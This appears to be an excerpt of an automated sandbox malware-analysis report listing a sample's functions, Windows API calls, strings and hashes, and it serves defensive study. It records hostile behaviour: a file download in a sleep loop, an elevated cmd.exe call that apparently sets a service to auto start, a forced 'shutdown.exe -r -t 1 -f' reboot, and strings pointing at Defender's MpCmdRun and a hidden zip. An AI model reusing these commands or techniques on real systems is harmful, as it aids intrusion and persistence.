                                                                    Download Yara Rule
                                                                    APIs
                                                                    • VirtualAlloc.KERNEL32(00000000,0013FFF0,00001000,00000004,?,?,00405C63), ref: 00405663
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3855596055.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856957335.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856999369.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857029518.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857067852.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857104267.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857141551.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: AllocVirtual
                                                                    • String ID:
                                                                    • API String ID: 4275171209-0
                                                                    • Opcode ID: d6471b694c53482f29af37f4d684f3e9f2dc181e884f57fe696aea683e58fed0
                                                                    • Instruction ID: 7b51e7b86078a4719c2a56ad589d93d8956ad9d8034c142f37d3783c14cff872
                                                                    • Opcode Fuzzy Hash: d6471b694c53482f29af37f4d684f3e9f2dc181e884f57fe696aea683e58fed0
                                                                    • Instruction Fuzzy Hash: EEF0AFF2B013018FE7549F789D417027BD6E705354F10817EE90DEBB98D7B088418B94
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Non-executed Functions

                                                                    Function 0040CE18 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 140stringlibraryfileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?), ref: 0040CE35
                                                                    • GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 0040CE46
                                                                    • FindFirstFileW.KERNEL32(?,?,kernel32.dll,?,?,?), ref: 0040CF46
                                                                    • FindClose.KERNEL32(?,?,?,kernel32.dll,?,?,?), ref: 0040CF58
                                                                    • lstrlenW.KERNEL32(?,?,?,?,kernel32.dll,?,?,?), ref: 0040CF64
                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,kernel32.dll,?,?,?), ref: 0040CFA9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3855596055.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856957335.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856999369.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857029518.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857067852.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857104267.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857141551.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                    • String ID: GetLongPathNameW$\$kernel32.dll
                                                                    • API String ID: 1930782624-3908791685
                                                                    • Opcode ID: 1b30c6aa4afaed83ea31088e8fb335b792bc7b3c0a28b9d7d69bc162d0d5a7e3
                                                                    • Instruction ID: df3eba0b7ab91270250ab933d467d2b4ce9c97f00ef9e3a73738d7b4f4df9431
                                                                    • Opcode Fuzzy Hash: 1b30c6aa4afaed83ea31088e8fb335b792bc7b3c0a28b9d7d69bc162d0d5a7e3
                                                                    • Instruction Fuzzy Hash: D2417332E00519DBCB10EB68CCC5ADEB3B6AF44314F1486B6A504F72D1E7789E45DA89
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 005E0E94 Relevance: 12.1, APIs: 8, Instructions: 71windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 005E0EA2
                                                                    • IsIconic.USER32(?), ref: 005E0ED0
                                                                    • IsWindowVisible.USER32(?), ref: 005E0EE0
                                                                    • ShowWindow.USER32(?,00000000,00000000,?,?,?,005EE203,?,006551D0), ref: 005E0EFD
                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 005E0F10
                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 005E0F21
                                                                    • ShowWindow.USER32(?,00000006,00000000,?,?,?,005EE203,?,006551D0), ref: 005E0F41
                                                                    • ShowWindow.USER32(?,00000005,00000000,?,?,?,005EE203,?,006551D0), ref: 005E0F4B
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3855596055.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856957335.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856999369.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857029518.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857067852.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857104267.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857141551.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: Window$LongShow$IconicVisible
                                                                    • String ID:
                                                                    • API String ID: 3484284227-0
                                                                    • Opcode ID: 153ce922c674a532d80c97f86a4cd859b1415a9a321f720c0de561082abaa5d9
                                                                    • Instruction ID: fc07e678b8b521b91e32f980c44dac548b3b61d93d6eebad58e43b97ab7ab2bd
                                                                    • Opcode Fuzzy Hash: 153ce922c674a532d80c97f86a4cd859b1415a9a321f720c0de561082abaa5d9
                                                                    • Instruction Fuzzy Hash: B1113A2210EAD074D23A32371C02FEF1E985FD3324F18892EF1E8E50C2C26C89C5822B
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00633A38 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54sleepfilenetworkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • Sleep.KERNEL32(0000012C,00000000,00633AEE), ref: 00633A6F
                                                                    • URLDownloadToFileW.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 00633A8C
                                                                    • Sleep.KERNEL32(0000012C,0000012C,00000000,00633AEE), ref: 00633AC6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3855596055.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856957335.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856999369.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857029518.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857067852.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857104267.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857141551.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: Sleep$DownloadFile
                                                                    • String ID: dWe$hWe
                                                                    • API String ID: 2087964873-58362703
                                                                    • Opcode ID: 04cbe2486e640521b758a2ff6ddd802f746ddcb316689a65afaa4eebd1ce7cdd
                                                                    • Instruction ID: e38bbcdaf700aa6aab6cb9e7a4f3a98896630684cfae030678e04ef5b335f524
                                                                    • Opcode Fuzzy Hash: 04cbe2486e640521b758a2ff6ddd802f746ddcb316689a65afaa4eebd1ce7cdd
                                                                    • Instruction Fuzzy Hash: 62113D74600204AFD700EB55C892E8D77B5EF4A344F504076F504AB3E2D779AE019A99
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040C9BC Relevance: 4.6, APIs: 3, Instructions: 99COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • IsValidLocale.KERNEL32(?,00000002,00000000,0040CB21,?,?,?,00000000), ref: 0040CA66
                                                                    • GetLocaleInfoW.KERNEL32(00000000,00000059,?,00000055,?,00000002,00000000,0040CB21,?,?,?,00000000), ref: 0040CA82
                                                                    • GetLocaleInfoW.KERNEL32(00000000,0000005A,?,00000055,00000000,00000059,?,00000055,?,00000002,00000000,0040CB21,?,?,?,00000000), ref: 0040CA93
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3855596055.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856957335.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856999369.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857029518.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857067852.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857104267.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857141551.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: Locale$Info$Valid
                                                                    • String ID:
                                                                    • API String ID: 1826331170-0
                                                                    • Opcode ID: ad3de78e447f79a9d5c8a36d098a659f3a87ca39114a4d2c18dd351f82df870f
                                                                    • Instruction ID: 32193daf775a97d202d3fb3a0b5ab3bed95078009c6c530a1f27204a2a6a35ae
                                                                    • Opcode Fuzzy Hash: ad3de78e447f79a9d5c8a36d098a659f3a87ca39114a4d2c18dd351f82df870f
                                                                    • Instruction Fuzzy Hash: AD319E34A0061CEBDB20DF55DCC2B9EB7B6EB49701F5042BAA508B32D1D6396E80CE59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040F148 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3855596055.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856957335.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856999369.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857029518.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857067852.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857104267.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857141551.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: Version
                                                                    • String ID:
                                                                    • API String ID: 1889659487-0
                                                                    • Opcode ID: 1cd4377a6b1d967cc78fa149afafeeac03ff185f122abd55826d7edf55432034
                                                                    • Instruction ID: 7420d91a343197e2725c1ed6fdd5669b345e5498412afaef9b1ca0b30dea7431
                                                                    • Opcode Fuzzy Hash: 1cd4377a6b1d967cc78fa149afafeeac03ff185f122abd55826d7edf55432034
                                                                    • Instruction Fuzzy Hash: 39D0A979920E0281DB304720EE8133E30A2E3D2344FE08077C102A9EDAD53C8CC86509
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 005E0E10 Relevance: 1.5, APIs: 1, Instructions: 11windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3855596055.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856957335.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856999369.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857029518.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857067852.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857104267.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857141551.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: Iconic
                                                                    • String ID:
                                                                    • API String ID: 110040809-0
                                                                    • Opcode ID: 864a33c9d5ead3eb2f8eeadc0b8b6ecf4ddac0002db075a5c7f387cc0a82fc8a
                                                                    • Instruction ID: 18fab1817f0ac2ddc0a628744168dd28ff6dc8f748c4f05e99ad38f9ca4f3eba
                                                                    • Opcode Fuzzy Hash: 864a33c9d5ead3eb2f8eeadc0b8b6ecf4ddac0002db075a5c7f387cc0a82fc8a
                                                                    • Instruction Fuzzy Hash: A7C01270910E409BCB20E734D494AC03B567790312FD06A90E00286055D775A8C44710
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00639740 Relevance: 24.6, APIs: 3, Strings: 11, Instructions: 148sleepfileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0042547C: DeleteFileW.KERNEL32(00000000,?,?,?,?,0063989C,00639966,00000000,0063998E,?,?,00000000,00000000,?,?,00633AC1), ref: 0042548C
                                                                      • Part of subcall function 0042547C: GetLastError.KERNEL32(00000000,?,?,?,?,0063989C,00639966,00000000,0063998E,?,?,00000000,00000000,?,?,00633AC1), ref: 0042549B
                                                                      • Part of subcall function 0042547C: GetFileAttributesW.KERNEL32(00000000,00000000,?,?,?,?,0063989C,00639966,00000000,0063998E,?,?,00000000,00000000,?), ref: 004254A3
                                                                      • Part of subcall function 0042547C: RemoveDirectoryW.KERNEL32(00000000,00000000,00000000,?,?,?,?,0063989C,00639966,00000000,0063998E,?,?,00000000,00000000,?), ref: 004254BE
                                                                      • Part of subcall function 0042D8FC: GetEnvironmentVariableW.KERNEL32(00000000,?,00000400,?,?,?,?,006398D3,00639966,00000000,0063998E,?,?,00000000,00000000,?), ref: 0042D925
                                                                    • MoveFileW.KERNEL32(00000000,00000000), ref: 00639902
                                                                    • Sleep.KERNEL32(0000001E,00639966,00000000,0063998E,?,?,00000000,00000000,?,?,00633AC1,0000012C,00000000,00633AEE), ref: 00639909
                                                                      • Part of subcall function 00633BD8: ShellExecuteW.SHELL32(00000000,runas,cmd.exe,00000000," start= auto,?), ref: 00633C30
                                                                      • Part of subcall function 0063586C: Sleep.KERNEL32(00002328,00000000,006358AB,?,:c,00639951,.exe,:c,0000012C,0000001E,00639966,00000000,0063998E,?,?,00000000), ref: 00635882
                                                                      • Part of subcall function 0063586C: WinExec.KERNEL32(C:\WINDOWS\system32\shutdown.exe -r -t 1 -f,00000000), ref: 0063588E
                                                                      • Part of subcall function 0063586C: Sleep.KERNEL32(0000012C,00002328,00000000,006358AB,?,:c,00639951,.exe,:c,0000012C,0000001E,00639966,00000000,0063998E,?,?), ref: 00635898
                                                                    • Sleep.KERNEL32(0000012C,.exe,:c,0000012C,0000001E,00639966,00000000,0063998E,?,?,00000000,00000000,?,?,00633AC1,0000012C), ref: 00639956
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3855596055.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856957335.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856999369.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857029518.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857067852.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857104267.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857141551.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: Sleep$File$AttributesDeleteDirectoryEnvironmentErrorExecExecuteLastMoveRemoveShellVariable
                                                                    • String ID: .exe$Fairfield Burn$MpCmdRun$\Microsoft\Crypto\Keys\bin01.zip$appdata$bin01.zip$hWe$web1$web2$web3$:c
                                                                    • API String ID: 482055496-2407289723
                                                                    • Opcode ID: e37fd13f69adfa98b46b53a9ea0c25744da4257322702164be1620a3d4288908
                                                                    • Instruction ID: 6a08d19c26d714fab50d671978c63310f8441c2b808e462788730ff630382bdb
                                                                    • Opcode Fuzzy Hash: e37fd13f69adfa98b46b53a9ea0c25744da4257322702164be1620a3d4288908
                                                                    • Instruction Fuzzy Hash: A2511034A002089FCB04EB95D89299EB7B6FF49304F50457AF501BB3A1CA78AD11CFA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00408724 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 63libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,GetLogicalProcessorInformation), ref: 00408739
                                                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040873F
                                                                    • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 00408752
                                                                    • GetLastError.KERNEL32(00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 0040875B
                                                                    • GetLogicalProcessorInformation.KERNEL32(?,?,00000000,004087D2,?,00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 00408786
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3855596055.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856957335.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856999369.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857029518.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857067852.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857104267.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857141551.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: InformationLogicalProcessor$AddressErrorHandleLastModuleProc
                                                                    • String ID: @$GetLogicalProcessorInformation$kernel32.dll
                                                                    • API String ID: 1184211438-79381301
                                                                    • Opcode ID: cbf0cd720f7e1b1354e00fae55a999ce3961c8696a2936c52f21f92b8d5bab9f
                                                                    • Instruction ID: 94ed4e08121dfc731aadc6161b9dc92060a75603e21bf53f2b7b765583e3cb19
                                                                    • Opcode Fuzzy Hash: cbf0cd720f7e1b1354e00fae55a999ce3961c8696a2936c52f21f92b8d5bab9f
                                                                    • Instruction Fuzzy Hash: 58116075D00208AEDB10EBA6CE45B6EB7F4EB44304F6084BFE944B76C1DB7C9A408E59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004358F4 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 139COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0043598D
                                                                    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 004359A9
                                                                    • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 004359E2
                                                                    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 00435A5F
                                                                    • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 00435A78
                                                                    • VariantCopy.OLEAUT32(?), ref: 00435AAD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3855596055.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856957335.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856999369.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857029518.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857067852.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857104267.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857141551.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                    • String ID:
                                                                    • API String ID: 351091851-3916222277
                                                                    • Opcode ID: 53daf564fbfc4f2e90bc9f908b06c784015e8e5d50bafb180f1ae0b614ca888d
                                                                    • Instruction ID: 57dc533516daf27d20718af8ae304f80e1a5e57ae138a1668c92b3d964784860
                                                                    • Opcode Fuzzy Hash: 53daf564fbfc4f2e90bc9f908b06c784015e8e5d50bafb180f1ae0b614ca888d
                                                                    • Instruction Fuzzy Hash: 5751EDB59006299BCB26EB59C881BD9B3FCAF4C314F0051DAF508E7211D6389F858F65
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00409A2C Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 40fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,`Xd,00000000,?,00409AEA,?,?,00651B9C,00651B9C,?,?,00646C38,00410843,00645860), ref: 00409A65
                                                                    • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,`Xd,00000000,?,00409AEA,?,?,00651B9C,00651B9C,?,?,00646C38,00410843), ref: 00409A6B
                                                                    • GetStdHandle.KERNEL32(000000F5,00000000,00000002,`Xd,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,`Xd,00000000,?,00409AEA,?,?,00651B9C), ref: 00409A86
                                                                    • WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,`Xd,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,`Xd,00000000,?,00409AEA,?,?), ref: 00409A8C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3855596055.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856957335.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856999369.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857029518.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857067852.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857104267.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857141551.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: FileHandleWrite
                                                                    • String ID: Error$Runtime error at 00000000$`Xd
                                                                    • API String ID: 3320372497-4153497386
                                                                    • Opcode ID: 4d072716b74e4d2d4f0292f5c53dc76595c072d064c7cbb48b596f4c713f257c
                                                                    • Instruction ID: c079a58617cb9f0810b361c2046c62cec813f90908bc8480150aa18e021c2eb6
                                                                    • Opcode Fuzzy Hash: 4d072716b74e4d2d4f0292f5c53dc76595c072d064c7cbb48b596f4c713f257c
                                                                    • Instruction Fuzzy Hash: C6F0C2A478038078EB20BB608C07F1B36299B42B15F50613FB124B90C2C6BC48888AAA
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00405CEC Relevance: 12.2, APIs: 8, Instructions: 221sleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
